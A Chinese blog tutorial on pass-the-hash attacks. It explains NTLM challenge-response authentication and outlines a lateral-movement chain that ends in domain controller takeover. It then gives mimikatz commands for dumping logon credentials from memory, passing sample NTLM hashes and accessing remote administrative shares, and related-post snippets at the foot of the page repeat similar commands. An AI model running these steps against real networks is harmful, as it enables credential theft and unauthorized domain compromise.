内网渗透--哈希传递

于 2023-11-28 19:15:44 发布
阅读量1.1k 收藏 26
点赞数 26
文章标签: 哈希算法 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62202418/article/details/134670348
版权

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

NTLM 是一种用于身份验证和会话安全的协议。它最初由微软开发,用于 Windows 操作系统中的身份验证和安全服务。NTLM 协议主要用于在 Windows 网络环境中对用户进行身份验证,并且在许多企业网络中被广泛采用。

NTLM 协议的工作原理涉及以下几个步骤:

  1. 挑战-响应(Challenge-Response)身份验证:在进行身份验证时,服务器会向客户端发送一个随机数值(挑战),客户端使用该挑战和用户的凭据计算出一个响应,然后将响应发送回服务器进行验证。
  2. 会话安全:一旦身份验证成功,NTLM 还提供了会话级别的安全机制,用于加密和保护通信中的数据。

原理

哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。

NTLM验证靠HASH值

  1. 获得一台域主机的权限
  2. Dump内存获得用户hash
  3. 通过pass the hash尝试登录其他主机
  4. 继续搜集hash并尝试远程登录
  5. 直到获得域管理员账户hash,登录域控,最终成功控制整个域
1、client发送账户名user到server
2、server判断本地账户名是否存在,没有则失败,有的话生成challenge,查找user对应的NTLM哈希,使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client
3、client接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,发送response给server
4、server对比自己内存中的net-ntlm hash与client发来的response是否一致

注意:challenge每次认证都不一样,是一个随机生成的16字节随机数,response的形势与server生成的net-ntlm hash一个格式

图示:
在这里插入图片描述

Hash传递攻击利用

利用工具:mimikatz

privilege::debug                            提升权限(注:需以管理员权限运行)
sekurlsa::logonpasswords          			获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:123.com /ntlm:a803cf45d87009c404eb89df4b1ae94c
弹出新窗口
dir \\10.10.10.254\c$

利用过程:
1.以管理员用户启动cmd。必须以管理员身份运行。在这里插入图片描述2.开启工具 mimikatz在这里插入图片描述
3.privilege::debug 提升权限到SYSTEM,因为只有SYSTEM用户才能读取内存中的Hash 值。
在这里插入图片描述
4.sekurlsa::logonpasswords ,获取内存中保存的登录信息。这个虚拟机版本不行,临时换了一台

在这里插入图片描述

5.sekurlsa::pth /user:administrator /domain:ab.com /ntlm:329153f560eb329c0e1deea55e88a1e9弹出来一个新的命令执行框。
pth: 攻击方式,hash传递
/user:administrator:认证用户名
/ntlm:获取的NTLM
在这里插入图片描述

6.dir \ip\c$ 查看c盘
在这里插入图片描述

奋斗的马喽
关注
  • 26
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【内网学习】4.LMHash和NTLM Hash
gclome的博客
03-06 6533
目录 1 LM Hash及其生成过程 2 NTLM Hash及其生成过程 3 生成lm hash和ntlm hash的网站 参考文章 windows 操作系统通常使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在ntds.dit中,加密后为散列值。 在windows下通过SAMInside提取到的密码Hash时,可以看到有两条,分别是LM-Hash和NT-Hash,这是对同一个密码的两种不同的加密方式。在windows操作系统中,hash的结构通常如下: user...
NTLM概述和哈希传递攻击
m0_60870041的博客
12-04 809
如何进行哈希传递攻击?
ntlm hash加密方式学习
qq_42077227的博客
04-21 1790
ntlm hash加密原理学习
域渗透06-协议(NTLM hash利用)
GalaxySpaceX的博客
11-07 304
协议(NTLM hash利用)
NTLM协议以及哈希传递攻击
oyqsb的博客
07-23 227
哈希传递利用的就是NTLM协议,攻击者通过获取本机的NTLM-hash,来对域内其它相同NTLM-hash的主机进行横向渗透,进行哈希传递攻击的条件就是域内的两台主机必须是密码相同的,因为NTLM-hash是通过加密密码得到的,所以这是大前提。
ISC-内网渗透 -最终版.pdf
最新发布
04-08
通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍,我们可以了解到,在实施内网渗透时,掌握这些核心技术点对于成功渗透目标网络至关重要。此外,合理运用各种技术和工具...
spring-data-redis-哈希操作.rar_redis-sprint
09-24
在IT行业中,Redis是一款广泛应用的高性能键值存储系统,它以数据结构服务器的形式工作,支持字符串、哈希、列表、集合、有序集合等多种数据结构。Spring Data Redis是Spring框架为Redis提供的一套全面的整合库,它...
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
【红蓝对抗之Windows内网渗透】是一种网络安全实践,旨在暴露系统漏洞并提高安全防护能力。在企业环境中,外部防御通常严密,但内部网络的安全状况可能相对较弱,因此攻击者常利用员工电脑、外网服务或WiFi等途径...
实验5----哈希表实验报告.doc
03-10
哈希表是一种高效的数据结构,它通过哈希函数将数据的关键字映射到一个固定大小的数组中,以此实现快速的查找、插入和删除操作。本实验的目的在于掌握哈希函数的设计方法,理解处理冲突的策略,以及学习如何在哈希表...
论文研究 - 云中密码哈希的安全性
05-22
在本文中,将通过基于概念GPU的实用证明,利用云计算的能力对密码哈希转储破解,来研究当今使用的各种... 本文的重点是展示云计算在破解哈希转储中的可能用途,以及通过使用安全哈希算法和复杂密码对付它们的方法。
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具包 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序: winexe 微信 管理系统 客户端 客户端 获取 网 要求 sh 所有工具都在只有base包的裸机 Arch linux 安装上进行了测试。 这什么时候有用? 当您使用自定义渗透测试操作系统并且您不想自己经历编译和修补这些工具的痛苦时 用于从受感染的 *nix 主机转向 Windows 框/域的后利用! 只需克隆这个 repo 或下载 tarball 就可以传递所有的哈希值了!
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1422
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
win10获取NTLM哈希
mengxp的博客
06-25 2529
https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/ Retrieving NTLM Hashes and what changed in Windows 10 Abstract Password are stored on hard dr...
“解密“Windows NTLM Hash
热门推荐
Yale的博客
03-22 1万+
从hashcat 3.30开始,在虚拟机中运行hashcat经常会报错,提示GPU错误。这是由于从该版本开始,hashcat对于Intel CPU会自动检测Intel OpenCL运行时,即是否支持GPU破解。如果不支持,就会停止运行。为了便于实验,我们使用2.0版本的hashcat 安装: wget https://hashcat.net/files/hashcat-2.00.7z 7z e h...
mimikatz使用哈希 ntlm传递 票据传递
YouthBelief的博客
12-16 1963
(1)管理员运行 (2)必须输入 privilege::debug (3)在目标主机使用mimikatz获取ntlm hash winserver 2012R2 之前版本 可以获取到明文密码 sekurlsa::logonpasswords (4) 哈希传递哈希传递到其他计算机上 进行登录域控验证 sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6
2014-Top40 hashes (LM/NTLM) Crack oclHashcat
代码析构师的专栏
01-25 792
?u?l?l?l?l?l?d?d ?u?l?l?l?l?l?l?d?d ?u?l?l?l?l?l?l?l?d?d ?u?l?l?l?d?d?d?d ?u?l?l?l?l?l?l?d ?u?l?l?l?l?d?d?d?d ?u?l?l?l?l?l?d?d?d?d ?u?l?l?l?l?l?l?l?d ?u?l?l?l?l?d?d?d ?u?l?l?d?l?l?l
Hash传递攻击Windows2012远程桌面
Coisini的博客
06-15 1314
前言: 小伙伴们还记得metasploit的模块可以使用hash登录windows么,可惜仅仅对XP,2003有效。本文会介绍一种使用hash登录 widnows2012R2服务器远程桌面的方法。是的,你没有看错,使用Hash登录远程桌面!windows2012R2中文版测试通过! windows2012R2采用了新版的远程桌面协议(RDP).本文主要讨论一下新版协议中的”受限管理员”(Rest...
Windows NTLM Hash和Hash传递、Key传递攻击
weixin_30563917的博客
07-04 1995
Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx...
ctf mysql hash传递_分享个 CTF 小工具 bruteHASH
weixin_35953844的博客
02-23 346
别问,问就是为了 CTF思路源于一次三小时十二题的内部 CTF 竞赛,其中一道简单 MISC 给出明文范围(字母数字)和 MD5 开头,要求穷举出 flag——这当然不难,python 十几行代码搞定,但是运行出结果竟然用了近 20 分钟,感觉十分没有性价比啊!!于是想找一个高性能(C/C++)指定格式 HASH 穷举工具,呃 无果……为了 CTF 需要构造 HASH 时能够“一把梭”,于是有了年...
->first哈希
07-29
引用\[1\]中提到了哈希表的正向迭代器的实现,其中包括存储哈希表地址的成员变量。引用\[2\]中提到了哈希表的析构函数的实现,其中释放了哈希表中的结点。引用\[3\]中提到了哈希表的拷贝构造函数的实现,其中进行了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值